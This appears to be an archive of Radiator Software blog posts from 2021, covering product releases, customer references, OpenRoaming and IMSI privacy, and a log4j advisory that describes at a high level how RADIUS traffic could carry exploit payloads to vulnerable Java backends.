Monday, December 20, 2021

Radiator used for authentication in water monitoring

Water monitoring is important in all regions of the world. In order to have a clear overall picture of such vital resource, it is necessary to have real-time data about river levels and flows, storage elevations and volumes, and water salinity.

Water monitoring organizations use remote sensor networks to monitor data such as reservoir levels, stream flows, and pipeline valve positions. Those sensors, often equipped with mobile data transceivers, are critical components of the water management system, and therefore need to be authenticated.

For one of our major customers in this field, we have provided a RADIUS authentication solution, using Radiator AAA server to authenticate around 2000 active devices currently in active service.

After the authentication is done, the sensors send their telemetry data to specialized data repositories for processing, analysis, and display, in order for customer organizations to know the real-time status of their water system.

Would you like to know more about using Radiator in device authentication?

If you are interested in using Radiator in device authentication - for example in telemetry or sensor networks, please do not hesitate to contact our sales team at sales@radiatorsoftware.com.

Radiator, being the most flexible AAA server in the market, may be just the solution for your authentication use case.

Monday, December 13, 2021

Radiator is not affected by log4j vulnerability

On the 10th of December 2021 a vulnerability (CVE-2021-44228) in a popular Java-based logging utility log4j was published. Since then we have received some customer queries about Radiator’s vulnerability.

Radiator does not utilise Java or log4j as a component of our software and is therefore not vulnerable to the log4j vulnerability.

While following closely the situation, research and responses around the vulnerability, we have identified that RADIUS protocol and infrastructure can be used to deliver the exploit to more vulnerable services such as Java-based backend services, AAA information sources and centralised logging systems. We have documented this delivery method principle into a separate blog post found here:

https://blog.radiatorsoftware.com/2021/12/radius-servers-and-log4j-vulnerability.html

We will continue monitoring the issue closely and announce if issues affecting Radiator or Radiator services are found.

RADIUS servers and log4j vulnerability

On the 10th of December 2021 a vulnerability (CVE-2021-44228) in a popular Java-based logging utility log4j was published. While Radiator and some other RADIUS servers are not themselves vulnerable, log4j may be used in Java based user interfaces, log processors and many other supporting services and software. The systems and networks using RADIUS authentication can then be used to deliver the exploit to some other vulnerable services even if the exploit does not affect the RADIUS server systems directly.

Figure 1: RADIUS infrastructure as a delivery method for log4j exploits

The attacker can always try to exploit accessible network devices directly. Many network devices nowadays use Java based user interfaces and logging systems, which include log4j as a component and are therefore vulnerable to a direct attack. The attack can however reach deeper into backend services via RADIUS authentication without the need for the attacker to reach the actual backend services directly.

If the attacker is able to get the network device to add a suitable exploit payload to the RADIUS request, that payload can then be delivered through the RADIUS server to backend services and even outside one organisation. The payload does not affect the RADIUS servers themselves (unless they use Java and log4j) but RADIUS and RADIUS federations may be used as a delivery mechanism for exploits to reach more interesting targets.

Mitigating the risk by filtering and sanitising RADIUS attributes in RADIUS servers is likely to break more than it protects. It is more productive to focus on updating or possibly replacing log4j using systems than trying to prevent the delivery of the exploit.


Friday, November 19, 2021

Companion to Radiator 4.26: SIM support 2.7 and Carrier module 1.7 released

We are very pleased to announce the release of Radiator SIM Module 2.7 and Radiator Carrier Module 1.7. This release is in companion to the most recent Radiator 4.26 version, and brings a number of fixes and enhancements to Diameter and SIGTRAN. IMSI privacy is now tested against Wireless Broadband Alliance technical specification 'IMSI Privacy Protection for Wi-Fi'. Also included are number of smaller enhancements and bug fixes.

For the full product history, please visit the Radiator SIM Module revision history and Radiator Carrier Module revision history.

Radiator packages are available to download for current licensees from the downloads page and the Radiator repository.

Access to download the latest release can be renewed by placing an online renewal order or contacting sales@radiatorsoftware.com


Radiator Carrier Pack is now known as Radiator Service Provider Pack.

Wednesday, November 17, 2021

Connect to OpenRoaming™ with Radiator

Wireless Broadband Alliance (WBA), provides OpenRoaming™, a roaming federation service enabling an automatic and secure Wi-Fi experience globally. It creates a federation of networks and identity providers to enable automatic roaming and user onboarding on Wi-Fi. More information can be found from WBA OpenRoaming™ pages or from the video below.

 

Recently, we have seen developments where carriers and other organisations, such as universities, are embracing OpenRoaming™ for their guest Wi-Fi access. This industry backig and focus on end user experience is one of the key benefits of OpenRoaming™.

As OpenRoaming™ becomes more integrated in the Android and Apple devices, the host organisations do not need to worry about how they will provide guest user credentials for guests. The guests will already authenticate with Apple, Google, participating operators and even in the future with Facebook credentials to guest networks without requiring host organisations to instruct them or provide configuration to their devices. For users, this development would bring significant benefits: secure and easy access to the Wi-Fi network wherever they go.

Radiator Software, being a WBA member and solution provider, can provide your organisation the products and services you need in order to join OpenRoaming™.

Radiator supports OpenRoaming™ requirements

For OpenRoaming™, support both for RadSec and DNSRoaming protocol is needed in order to implement the roaming securely and without extra effort to the end user. Radiator AAA Server supports both these protocols as can be seen from our product page. With RadSec, we are proud to tell that Radiator was the first commercial AAA Server where the protocol was implemented.

At the same time, we have 20 years of experience for providing roaming solutions to our Radiator customers - especially for international roaming federations suchs as eduroam and govroam. For these customers, we can of course provide assistance when joining OpenRoaming™.

Interested in joining OpenRoaming™ using Radiator?

For OpenRoaming™, our team can offer you a complete package: providing the software and the installation and the configuration assistance in order to join OpenRoaming™. After this, with Radiator support, you can ask for any later on assistance needed if for example configuration changes are needed.

Please contact our sales team at sales@radiatorsoftware.com

Friday, October 29, 2021

Radiator 4.26 now available

We are pleased to announce the release of Radiator version 4.26. This version contains new features, enhancements, and bug fixes. 

Selected compatibility notes, enhancements and fixes

  • TLSv1.3 is currently disabled for AuthBy DUO.
  • AuthBy SQLTOTP now supports CHAP, MSCHAP and MSCHAPv2. EAP-MSCHAPv2 is supported with MSCHAPv2 conversion. Encrypted PIN is now supported for PAP, EAP-OTP and EAP-GTC.
  • Radiator SIM Pack 2.7 and Carrier Pack 1.7, or later, are strongly recommended.

Known caveats and other notes

  • TLSv1.3 remains disabled by default for TLS based EAP methods and Stream based classes, such as RadSec.
  • EAP-FAST functionality is reported to vary between TLS versions, TLS library security level settings and client implementations.

More detailed changes can be found in the revision history.

Radiator packages are available to download for current licensees from the downloads page and the Radiator repository.

Access to download the latest release can be renewed by placing an online renewal order or contacting sales@radiatorsoftware.com


Friday, October 15, 2021

Radiator provides IMSI privacy for EAP-SIM, EAP-AKA and EAP-AKA’ authentication

In many high traffic areas such as sports stadiums, shopping venues, or public transport hubs, mobile carriers may partner with the local Wi-Fi providers to improve coverage and user experience: mobile devices can be automatically connected to Wi-Fi instead of congested cellular network. Internationally, Wi-Fi roaming agreements also allow carriers to lower the cellular roaming costs. 

EAP-SIM, EAP-AKA and EAP-AKA’ are SIM-based Wi-Fi authentication methods used to achieve seamless offloading to carrier and partner Wi-Fi, with International Mobile Subscriber Identifier (IMSI) derived from the SIM card acting as a unique identifier for each user. 

On the first ever connection to such a Wi-Fi network, the mobile device communicates its permanent subscriber identity information (IMSI), which is then sent to the home operator for authentication. This identity is sent in the clear. A potential 3rd party adversary installing a Wi-Fi sniffer in the vicinity of such networks can harvest permanent identities and track users. This tracking can also be done by the venue or network owner when connecting to the Wi-Fi network. 

Because of this, mobile operating systems such as iOS15 will show the following warning when joining a Wi-Fi network without IMSI encryption: “your mobile subscriber identity will be exposed”. The similar situation can be seen from the pictures below. 

Privacy warning when authenticating to Wi-Fi network without IMSI encryption

 

Operators risk decreased user satisfaction for Wi-Fi offloading if transmitting IMSI in the open - it may cause users to feel their privacy is being compromised.

Radiator SIM Pack provides IMSI privacy protection 

The solution is to protect user privacy by implementing IMSI encryption for EAP-SIM, EAP-AKA and EAP-AKA’ authentication. As an operator, you can enable IMSI privacy easily: Radiator 3GPP AAA Server handles both encrypted and clear authentication requests. This means IMSI privacy can be offered to devices supporting it without affecting other users. 

Starting already from revision 2.5, Radiator SIM Pack supports IMSI encryption as specified in 3GPP S3-170116 document “Privacy Protection for EAP-AKA” (zip), and WBA’s IMSI Privacy Protection for Wi-Fi – Technical Specification. The feature is already implemented by some of our operator customers to cover their AAA server encryption. 

The latest release of Radiator SIM Pack is available for new licensees and for licensed customers with valid download access. To find out if Radiator SIM Pack suits your needs, you can contact us at sales@radiatorsoftware.com and a member of our sales team will be happy to assist you. 

You can also contact us to renew your support contract and get access to the newest release. A full history of Radiator SIM Pack releases is available on our website.

Tuesday, October 5, 2021

Radiator and NCINGA - working together towards customer success

 

 

 

While Radiator has hundreds of operator customers all over the world, we also have an extensive network of integrator partners providing turn-key solutions for our customers. One of these trusted integrators is NCINGA.  As NCINGA is known to provide technology transformations in frontier markets, they also provide Radiator AAA solutions to operators and carriers especially in the APAC area.

This collaboration has provided solutions to customers both for fixed and wireless AAA. In
different use cases, the main focus in the cooperation has involved integrating Radiator
solutions with different vendor environments and network elements. Radiator is used for
example when applying policy and control functionalities for end user data plans.

    “With Radiator, we were able to quickly deliver complex AAA implementations. It was easy
    to configure and extend to the customers need. The Radiator Technical Support team made
    it even easier to implement & support with prompt responses and guidance.” 

    -Kokum Randeni, VP Sales, Ncinga

One of the key elements in the working model has been the flexibility in Radiator licensing:
the components needed by the customer can be tailored to the use case and number of
subscribers. This way the ROI for the customer can be ensured as they can add new
features of Radiator to use when needed.

For the customer, the operating model is quite easy and straightforward: NCINGA and their
team of experts provide the first level support and integration consultation, and the Radiator
team provides the product-related 2nd level support and consultation related to Radiator
specific configuration and other needs.

Would you like to know more about Radiator and NCINGA?

If you are looking for a carrier-grade AAA server with flexible options for different use cases,
please do not hesitate to contact our sales team at sales(a)radiatorsoftware.com. For
NCINGA, please contact their sales team at www.ncinga.net.


Examples of Radiator use include carrier-grade AAA, Wi-Fi offloading, integrating Diameter
online and offline charging with RADIUS-based infrastructure, integrating RADIUS
accounting with Diameter online and offline charging and much more. On top of that, our
support team has wide experience of various carrier use cases in different environments.

Tuesday, September 21, 2021

Customer reference: Salt Mobile SA using Radiator Policy and Charging Pack

Salt Mobile SA uses Radiator for their Diameter interfaces

 

Swiss mobile operator Salt Mobile SA (Salt), one of the top operators in Switzerland, has been using Radiator Policy and Charging Pack since late 2020 for their 2 million customers. The use case in Salt has evolved from initial use of Radiator Enterprise Pack to the use of Radiator Policy and Charging Pack. 

 

The flexibility of Radiator licensing models has provided cost-efficient, step-by-step licensing where additional modules have been added when needed. 


Salt has been using Radiator products for several years. Nowadays, Salt uses Policy and Charging Pack for the charging and accounting of their customers' pre-paid and post-paid plans. Radiator Telco Pack provides the Diameter Gy and Gx interfaces specified by the 3GPP to implement this:


“We use Radiator for our DATA and SMS real-time charging (using Gy Diameter protocol). It sits between our core network elements (SMSC/GGSN) and our online charging system. All our DATA and SMS traffic (national and roaming ) is controlled using this flow. On top of that we use the control function (Gx) to apply throttling on the DATA flow for roaming.” 

-Annaick Rinderknecht, Devops Manager, IT, Salt Mobile

Would you like to know more? 


If you are looking for a carrier-grade AAA server with flexible options for different use cases, please do not hesitate to contact our sales team. 


For example, in the use case mentioned, Radiator Policy and Charging Pack extends Radiator by allowing direct connections to your 3GPP infrastructure through Diameter interfaces – a protocol commonly used in telecommunication systems. Radiator Policy and Charging Pack includes support for different policy and charging related interfaces and implementations specified by the 3GPP.

Examples of use include Wi-Fi offloading, integrating Diameter online and offline charging with RADIUS based infrastructure, integrating RADIUS accounting with Diameter online and offline charging and much more.

Our support team has wide experience of various carrier use cases in different environments and we are happy to help you in all your AAA needs.

Edit: Radiator Policy and Charging Pack was previously knowns as Radiator Telco Pack. Name of the product has been updated in the blog.

Wednesday, February 3, 2021

Radiator SIM Module 2.6 released

We are pleased to announce the release 2.6 of Radiator SIM Module. This release includes 3GPP emergency call support and overall enhanced 3GPP AAA Server support, as well as a number of enhancements and bug fixes. 

Customers with valid download access contracts can download updated software packages from our downloads site. Please note that Radiator 4.24 or later and Radiator Carrier Module 1.6 or later are required. 

If you would like to renew your download access contract, or need professional assistance with updating or migrating, please contact sales@radiatorsoftware.com and a member of our sales team will be happy to assist.

Revision 2.6 detailed updates and fixes:

  • Invalid APN formats are now rejected early.
  • Included APN match in S6b authorisation checks.
  • Fixed a crash in 3GPP AAA Server triggered by retransmitted messages.
  • Updated identity handling with IMSI encryption based on observed client behaviour.
  • RAT-Type for SWx requests is now set to the value received over SWm defaulting to VIRTUAL. Previously WLAN was always used by 3GPP AAA Server.
  • 3GPP-Charging-Characteristics is now copied to SWm answers when available. Subscription-Id was not added to SWm AAA messages after the user profile was updated by HSS with Push-Profile Request.
  • AAA-Failure-Indication is now sent over SWx to HSS. Previously the VSA was ignored when received from an ePDG.
  • Terminal-Information is now added to SWx requests as required by 29.273 version 13 and later.
  • Enhanced 3GPP AAA Server support to cover 29.273 version 15.4.0. The main behaviour change is S6b triggered PGW registration which is no longer done as often. This was clarified in 29.273 13.4.0 correction CP-160220 CR 0457.
  • Emergency services for authenticated users are now supported by 3GPP AAA Server. Support for emergency services needs to be enabled with a new configuration flag parameter EmergencyServices. When EmergencyServices parameter is set and SQL is used for a session database, one new column and SQL query modifications are needed.
  • Updated 3GPPP AAA Server SWm, SWx and S6b dictionaries for 29.273 version 15.4.0.
  • Crypt::Rijndael is no longer required when Radius::UtilXS release 2.2 or later and Radiator 4.25 or later is installed.
  • 3GPP AAA Server SQL and Redis based session backends no longer trigger unnecessary lookups and SWx deregistration updates when session termination requests are received over SWm or S6b. This can reduce Diameter traffic significantly with certain configurations where lots of clients are not allowed to connect and gateway devices send STRs for these attempts.
  • Removed warnings logged to STDERR by 3GPP AAA Server when processing certain request types. These warnings were harmless but cause unnecessary log entries.
  • 3GPP AAA Server now supports stripping MAC address from NAI format usernames. A new optional configuration parameter StripMACFromUserName controls how this is done.
  • A number of code clean up and maintenance changes were done based on Perl::Critic and other tools.
  • Requires Radiator 4.24 or later and Carrier Module 1.6 or later with 3GPP AAA Server. Radiator 4.24 and later are recommended with plain EAP-SIM, EAP-AKA and EAP-AKA’.
For more information, you can see the Radiator SIM Pack product page or contact us directly at info@radiatorsoftware.com.